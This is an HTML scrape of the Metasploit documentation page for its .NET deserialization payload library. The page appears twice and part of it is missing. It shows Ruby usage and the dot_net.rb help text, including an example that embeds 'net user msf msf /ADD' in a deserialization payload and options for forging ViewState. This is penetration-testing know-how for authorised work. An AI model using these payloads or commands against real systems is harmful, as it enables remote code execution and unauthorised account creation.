docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html

<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><link rel="shortcut icon" href="/assets/images/favicon.png" type="image/x-icon"><link rel="stylesheet" href="/assets/css/just-the-docs-default.css"> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-4622520-7"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-4622520-7', { 'anonymize_ip': true }); </script> <script type="text/javascript" src="/assets/js/vendor/lunr.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/mermaid@10.8.0/dist/mermaid.min.js"></script> <script type="text/javascript" src="/assets/js/just-the-docs.js"></script><meta name="viewport" content="width=device-width, initial-scale=1"><title>Dot Net Deserialization | Metasploit Documentation Penetration Testing Software, Pen Testing Security</title><meta name="generator" content="Jekyll v4.3.4" /><meta property="og:title" content="Dot Net Deserialization" /><meta property="og:locale" content="en_US" /><meta name="description" content="View Metasploit Framework Documentation" /><meta property="og:description" content="View Metasploit Framework Documentation" /><link rel="canonical" href="https://rapid7.github.io/metasploit-framework/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html" /><meta property="og:url" content="https://rapid7.github.io/metasploit-framework/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html" /><meta property="og:site_name" content="Metasploit Documentation Penetration Testing Software, Pen Testing Security" /><meta property="og:type" content="website" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Dot Net Deserialization" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"WebPage","description":"View Metasploit Framework Documentation","headline":"Dot Net Deserialization","publisher":{"@type":"Organization","logo":{"@type":"ImageObject","url":"https://rapid7.github.io/metasploit-framework/assets/images/favicon.png"}},"url":"https://rapid7.github.io/metasploit-framework/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html"}</script><body> <svg xmlns="http://www.w3.org/2000/svg" style="display: none;"> <symbol id="svg-link" viewBox="0 0 24 24"><title>Link</title><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-link"><path d="M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71"></path><path d="M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71"></path> </svg> </symbol> <symbol id="svg-search" viewBox="0 0 24 24"><title>Search</title><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-search"> <circle cx="11" cy="11" r="8"></circle><line x1="21" y1="21" x2="16.65" y2="16.65"></line> </svg> </symbol> <symbol id="svg-menu" viewBox="0 0 24 24"><title>Menu</title><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-menu"><line x1="3" y1="12" x2="21" y2="12"></line><line x1="3" y1="6" x2="21" y2="6"></line><line x1="3" y1="18" x2="21" y2="18"></line> </svg> </symbol> <symbol id="svg-arrow-right" viewBox="0 0 24 24"><title>Expand</title><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-chevron-right"><polyline points="9 18 15 12 9 6"></polyline> </svg> </symbol> <symbol id="svg-doc" viewBox="0 0 24 24"><ti
<span class="n">formatted</span> <span class="o">=</span> <span class="n">generate_formatted</span><span class="p">(</span><span class="n">stream</span><span class="p">,</span> <span class="n">formatter</span><span class="p">)</span>
</code></pre></div></div><h3 id="example-usage"> <a href="#example-usage" class="anchor-heading" aria-labelledby="example-usage"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> Example Usage</h3><p>The following example uses the <code class="language-plaintext highlighter-rouge">TextFormattingRunProperties</code> gadget chain formatted with the <code class="language-plaintext highlighter-rouge">LosFormatter</code>.</p><div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">serialized</span> <span class="o">=</span> <span class="o">::</span><span class="no">Msf</span><span class="o">::</span><span class="no">Util</span><span class="o">::</span><span class="no">DotNetDeserialization</span><span class="p">.</span><span class="nf">generate</span><span class="p">(</span>
 <span class="n">cmd</span><span class="p">,</span>  <span class="c1"># this is the Operating System command to run</span>
 <span class="ss">gadget_chain: :TextFormattingRunProperties</span><span class="p">,</span>
 <span class="ss">formatter: :LosFormatter</span>
<span class="p">)</span>
</code></pre></div></div><h2 id="command-line-tool"> <a href="#command-line-tool" class="anchor-heading" aria-labelledby="command-line-tool"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> Command Line Tool</h2><p>The library also has an interface available as a standalone command line tool which is suitable for creating payloads for single-use research purposes. This tool <code class="language-plaintext highlighter-rouge">dot_net.rb</code> is available in the <code class="language-plaintext highlighter-rouge">tools/payloads/ysoserial</code> directory. The arguments for this tool are aligned with those of <a href="https://github.com/pwntester/ysoserial.net">YSoSerial.NET</a>, allowing the arguments of basic invocations to be the same. It should be noted however that the <a href="#support-matrix">supported</a> gadgets and formatters are not the same.</p><p>Help output:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Usage: ./dot_net.rb [options]

Generate a .NET deserialization payload that will execute an operating system
command using the specified gadget chain and formatter.

Available formatters:
  * BinaryFormatter
  * LosFormatter
  * SoapFormatter

Available gadget chains:
  * ClaimsPrincipal
  * DataSet
  * DataSetTypeSpoof
  * ObjectDataProvider
  * TextFormattingRunProperties
  * TypeConfuseDelegate
  * WindowsIdentity

Available HMAC algorithms: SHA1, HMACSHA256, HMACSHA384, HMACSHA512, MD5

Examples:
  ./dot_net.rb -c "net user msf msf /ADD" -f BinaryFormatter -g TypeConfuseDelegate -o base64
  ./dot_net.rb -c "calc.exe" -f LosFormatter -g TextFormattingRunProperties \
    --viewstate-validation-key deadbeef --viewstate-validation-algorithm SHA1

General options:
    -h, --help                       Show this message
    -c, --command   &lt;String&gt;         The command to run
    -f, --formatter &lt;String&gt;         The formatter to use (default: BinaryFormatter)
    -g, --gadget    &lt;String&gt;         The gadget chain to use (default: TextFormattingRunProperties)
    -o, --output    &lt;String&gt;         The output format to use (default: raw, see: --list-output-formats)
        --list-output-formats        List available output formats, for use with --output

ViewState related options:
        --viewstate-generator             &lt;String&gt;
                                     The ViewState generator string to use
        --viewstate-validation-algorithm  &lt;String&gt;
                                     The validation algorithm (default: SHA1, see: Available HMAC algorithms)
        --viewstate-validation-key        &lt;HexString&gt;
                                     The validationKey from the web.config file
</code></pre></div></div><p>The <code class="language-plaintext highlighter-rouge">-g</code> / <code class="language-plaintext highlighter-rouge">--gadget</code> option maps to the <em>gadget_chain</em> argument for the generate functions while the <code class="language-plaintext highlighter-rouge">-f</code> / <code class="language-plaintext highlighter-rouge">--formatter</code> arguments maps to the <em>formatter</em> argument.</p><h2 id="making-changes"> <a href="#making-changes" class="anchor-heading" aria-labelledby="making-changes"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> Making Changes</h2><p>Adding new gadget chains and formatters involves creating a new file in the respective library directory: <a href="https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization"><code class="language-plaintext highlighter-rouge">lib/msf/util/dot_net_deserialization</code></a>. The “native” gadget chain type is implemented following the <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrbf/75b9fe09-be15-475f-85b8-ae7b7558cfe5">MS-NRBF</a> format and the <a href="https://github.com/dmendel/bindata">Bindata</a> records as defined in <a href="https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization/types"><code class="language-plaintext highlighter-rouge">types/</code></a> subdirectory. Once the new gadget chain or formatter is implemented, it needs to be added to the main library file (<a href="https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/util/dot_net_deserialization.rb"><code class="language-plaintext highlighter-rouge">dot_net_deserialization.rb</code></a>).</p><p>Since serialization chain generate is deterministic, a <a href="https://github.com/rapid7/metasploit-framework/blob/master/spec/lib/msf/util/dot_net_deserialization_spec.rb">unit test</a> should be added for any new gadget chain to ensure that the checksum of the BinaryFormatter representation is consistent.</p><h2 id="further-reading"> <a href="#further-reading" class="anchor-heading" aria-labelledby="further-reading"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> Further Reading</h2><p>Since the .NET deserialization gadgets run operating system commands, the following resources can be helpful for module developers to deliver native payloads such as Meterpreter.</p><ul><li><a href="/docs/development/developing-modules/guides/how-to-use-command-stagers.html">How to use command stagers</a><li><a href="/docs/development/developing-modules/libraries/how-to-use-powershell-in-an-exploit.html">How to use Powershell in an exploit</a></ul><hr><footer><p><a href="#top" id="back-to-top">Back to top</a></p><p class="text-small text-grey-dk-000 mb-0"> <a href="https://github.com/rapid7/metasploit-framework/tree/master/docs/metasploit-framework.wiki/Dot-Net-Deserialization.md" id="edit-this-page">Edit this page on GitHub</a></p></footer></div></div><div class="search-overlay"></div></div><script type="text/javascript" src="/assets/js/toggle_mode.js"></script> <script> var config = { theme: 'default', logLevel: 'fatal', securityLevel: 'strict', startOnLoad: true, arrowMarkerAbsolute: false, er: { diagramPadding: 20, layoutDirection: 'TB', minEntityWidth: 100, minEntityHeight: 75, entityPadding: 15, stroke: 'gray', fill: 'honeydew', fontSize: 12, useMaxWidth: true, }, flowchart:{ diagramPadding: 8, htmlLabels: true, curve: 'basis', }, sequence: { diagramMarginX: 50, diagramMarginY: 10, actorMargin: 50, width: 150, height: 65, boxMargin: 10, boxTextMargin: 5, noteMargin: 10, messageMargin: 35, messageAlign: 'center', mirrorActors: true, bottomMarginAdj: 1, useMaxWidth: true, rightAngles: false, showSequenceNumbers: false, }, gantt: { titleTopMargin: 25, barHeight: 20, barGap: 4, topPadding: 50, leftPadding: 75, fontSize: 11, gridLineStartPadding: 35, fontFamily: '\'Open Sans\', sans-serif', numberSectionStyles: 4, axisFormat: '%Y-%m-%d', topAxis: false, }, }; mermaid.initia
Reboot gh-pages 2026-05-08 17:08:43 +00:00			<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><link rel="shortcut icon" href="/assets/images/favicon.png" type="image/x-icon"><link rel="stylesheet" href="/assets/css/just-the-docs-default.css"> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-4622520-7"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-4622520-7', { 'anonymize_ip': true }); </script> <script type="text/javascript" src="/assets/js/vendor/lunr.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/mermaid@10.8.0/dist/mermaid.min.js"></script> <script type="text/javascript" src="/assets/js/just-the-docs.js"></script><meta name="viewport" content="width=device-width, initial-scale=1"><title>Dot Net Deserialization \| Metasploit Documentation Penetration Testing Software, Pen Testing Security</title><meta name="generator" content="Jekyll v4.3.4" /><meta property="og:title" content="Dot Net Deserialization" /><meta property="og:locale" content="en_US" /><meta name="description" content="View Metasploit Framework Documentation" /><meta property="og:description" content="View Metasploit Framework Documentation" /><link rel="canonical" href="https://rapid7.github.io/metasploit-framework/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html" /><meta property="og:url" content="https://rapid7.github.io/metasploit-framework/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html" /><meta property="og:site_name" content="Metasploit Documentation Penetration Testing Software, Pen Testing Security" /><meta property="og:type" content="website" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Dot Net Deserialization" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"WebPage","description":"View Metasploit Framework Documentation","headline":"Dot Net Deserialization","publisher":{"@type":"Organization","logo":{"@type":"ImageObject","url":"https://rapid7.github.io/metasploit-framework/assets/images/favicon.png"}},"url":"https://rapid7.github.io/metasploit-framework/docs/development/developing-modules/libraries/deserialization/dot-net-deserialization.html"}</script><body> <svg xmlns="http://www.w3.org/2000/svg" style="display: none;"> <symbol id="svg-link" viewBox="0 0 24 24"><title>Link</title><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-link"><path d="M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71"></path><path d="M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71"></path> </svg> </symbol> <symbol id="svg-search" viewBox="0 0 24 24"><title>Search</title><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-search"> <circle cx="11" cy="11" r="8"></circle><line x1="21" y1="21" x2="16.65" y2="16.65"></line> </svg> </symbol> <symbol id="svg-menu" viewBox="0 0 24 24"><title>Menu</title><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-menu"><line x1="3" y1="12" x2="21" y2="12"></line><line x1="3" y1="6" x2="21" y2="6"></line><line x1="3" y1="18" x2="21" y2="18"></line> </svg> </symbol> <symbol id="svg-arrow-right" viewBox="0 0 24 24"><title>Expand</title><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-chevron-right"><polyline points="9 18 15 12 9 6"></polyline> </svg> </symbol> <symbol id="svg-doc" viewBox="0 0 24 24"><ti
			`<span class="n">formatted</span> <span class="o">=</span> <span class="n">generate_formatted</span><span class="p">(</span><span class="n">stream</span><span class="p">,</span> <span class="n">formatter</span><span class="p">)</span>`
			</code></pre></div></div><h3 id="example-usage"> <a href="#example-usage" class="anchor-heading" aria-labelledby="example-usage"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> Example Usage</h3><p>The following example uses the <code class="language-plaintext highlighter-rouge">TextFormattingRunProperties</code> gadget chain formatted with the <code class="language-plaintext highlighter-rouge">LosFormatter</code>.</p><div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">serialized</span> <span class="o">=</span> <span class="o">::</span><span class="no">Msf</span><span class="o">::</span><span class="no">Util</span><span class="o">::</span><span class="no">DotNetDeserialization</span><span class="p">.</span><span class="nf">generate</span><span class="p">(</span>
			`<span class="n">cmd</span><span class="p">,</span> <span class="c1"># this is the Operating System command to run</span>`
			`<span class="ss">gadget_chain: :TextFormattingRunProperties</span><span class="p">,</span>`
			`<span class="ss">formatter: :LosFormatter</span>`
			`<span class="p">)</span>`
			</code></pre></div></div><h2 id="command-line-tool"> <a href="#command-line-tool" class="anchor-heading" aria-labelledby="command-line-tool"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> Command Line Tool</h2><p>The library also has an interface available as a standalone command line tool which is suitable for creating payloads for single-use research purposes. This tool <code class="language-plaintext highlighter-rouge">dot_net.rb</code> is available in the <code class="language-plaintext highlighter-rouge">tools/payloads/ysoserial</code> directory. The arguments for this tool are aligned with those of <a href="https://github.com/pwntester/ysoserial.net">YSoSerial.NET</a>, allowing the arguments of basic invocations to be the same. It should be noted however that the <a href="#support-matrix">supported</a> gadgets and formatters are not the same.</p><p>Help output:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Usage: ./dot_net.rb [options]

			`Generate a .NET deserialization payload that will execute an operating system`
			`command using the specified gadget chain and formatter.`

			`Available formatters:`
			`* BinaryFormatter`
			`* LosFormatter`
			`* SoapFormatter`

			`Available gadget chains:`
			`* ClaimsPrincipal`
			`* DataSet`
			`* DataSetTypeSpoof`
			`* ObjectDataProvider`
			`* TextFormattingRunProperties`
			`* TypeConfuseDelegate`
			`* WindowsIdentity`

			`Available HMAC algorithms: SHA1, HMACSHA256, HMACSHA384, HMACSHA512, MD5`

			`Examples:`
			`./dot_net.rb -c "net user msf msf /ADD" -f BinaryFormatter -g TypeConfuseDelegate -o base64`
			`./dot_net.rb -c "calc.exe" -f LosFormatter -g TextFormattingRunProperties \`
			`--viewstate-validation-key deadbeef --viewstate-validation-algorithm SHA1`

			`General options:`
			`-h, --help Show this message`
			`-c, --command <String> The command to run`
			`-f, --formatter <String> The formatter to use (default: BinaryFormatter)`
			`-g, --gadget <String> The gadget chain to use (default: TextFormattingRunProperties)`
			`-o, --output <String> The output format to use (default: raw, see: --list-output-formats)`
			`--list-output-formats List available output formats, for use with --output`

			`ViewState related options:`
			`--viewstate-generator <String>`
			`The ViewState generator string to use`
			`--viewstate-validation-algorithm <String>`
			`The validation algorithm (default: SHA1, see: Available HMAC algorithms)`
			`--viewstate-validation-key <HexString>`
			`The validationKey from the web.config file`
			</code></pre></div></div><p>The <code class="language-plaintext highlighter-rouge">-g</code> / <code class="language-plaintext highlighter-rouge">--gadget</code> option maps to the <em>gadget_chain</em> argument for the generate functions while the <code class="language-plaintext highlighter-rouge">-f</code> / <code class="language-plaintext highlighter-rouge">--formatter</code> arguments maps to the <em>formatter</em> argument.</p><h2 id="making-changes"> <a href="#making-changes" class="anchor-heading" aria-labelledby="making-changes"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> Making Changes</h2><p>Adding new gadget chains and formatters involves creating a new file in the respective library directory: <a href="https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization"><code class="language-plaintext highlighter-rouge">lib/msf/util/dot_net_deserialization</code></a>. The “native” gadget chain type is implemented following the <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrbf/75b9fe09-be15-475f-85b8-ae7b7558cfe5">MS-NRBF</a> format and the <a href="https://github.com/dmendel/bindata">Bindata</a> records as defined in <a href="https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization/types"><code class="language-plaintext highlighter-rouge">types/</code></a> subdirectory. Once the new gadget chain or formatter is implemented, it needs to be added to the main library file (<a href="https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/util/dot_net_deserialization.rb"><code class="language-plaintext highlighter-rouge">dot_net_deserialization.rb</code></a>).</p><p>Since serialization chain generate is deterministic, a <a href="https://github.com/rapid7/metasploit-framework/blob/master/spec/lib/msf/util/dot_net_deserialization_spec.rb">unit test</a> should be added for any new gadget chain to ensure that the checksum of the BinaryFormatter representation is consistent.</p><h2 id="further-reading"> <a href="#further-reading" class="anchor-heading" aria-labelledby="further-reading"><svg viewBox="0 0 16 16" aria-hidden="true"><use xlink:href="#svg-link"></use></svg></a> Further Reading</h2><p>Since the .NET deserialization gadgets run operating system commands, the following resources can be helpful for module developers to deliver native payloads such as Meterpreter.</p><ul><li><a href="/docs/development/developing-modules/guides/how-to-use-command-stagers.html">How to use command stagers</a><li><a href="/docs/development/developing-modules/libraries/how-to-use-powershell-in-an-exploit.html">How to use Powershell in an exploit</a></ul><hr><footer><p><a href="#top" id="back-to-top">Back to top</a></p><p class="text-small text-grey-dk-000 mb-0"> <a href="https://github.com/rapid7/metasploit-framework/tree/master/docs/metasploit-framework.wiki/Dot-Net-Deserialization.md" id="edit-this-page">Edit this page on GitHub</a></p></footer></div></div><div class="search-overlay"></div></div><script type="text/javascript" src="/assets/js/toggle_mode.js"></script> <script> var config = { theme: 'default', logLevel: 'fatal', securityLevel: 'strict', startOnLoad: true, arrowMarkerAbsolute: false, er: { diagramPadding: 20, layoutDirection: 'TB', minEntityWidth: 100, minEntityHeight: 75, entityPadding: 15, stroke: 'gray', fill: 'honeydew', fontSize: 12, useMaxWidth: true, }, flowchart:{ diagramPadding: 8, htmlLabels: true, curve: 'basis', }, sequence: { diagramMarginX: 50, diagramMarginY: 10, actorMargin: 50, width: 150, height: 65, boxMargin: 10, boxTextMargin: 5, noteMargin: 10, messageMargin: 35, messageAlign: 'center', mirrorActors: true, bottomMarginAdj: 1, useMaxWidth: true, rightAngles: false, showSequenceNumbers: false, }, gantt: { titleTopMargin: 25, barHeight: 20, barGap: 4, topPadding: 50, leftPadding: 75, fontSize: 11, gridLineStartPadding: 35, fontFamily: '\'Open Sans\', sans-serif', numberSectionStyles: 4, axisFormat: '%Y-%m-%d', topAxis: false, }, }; mermaid.initia